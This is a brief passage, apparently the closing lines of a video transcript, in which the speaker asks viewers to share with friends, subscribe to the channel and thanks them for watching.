your friends, and don't forget to subscribe to our channel. Thanks for watching. Thank you very much.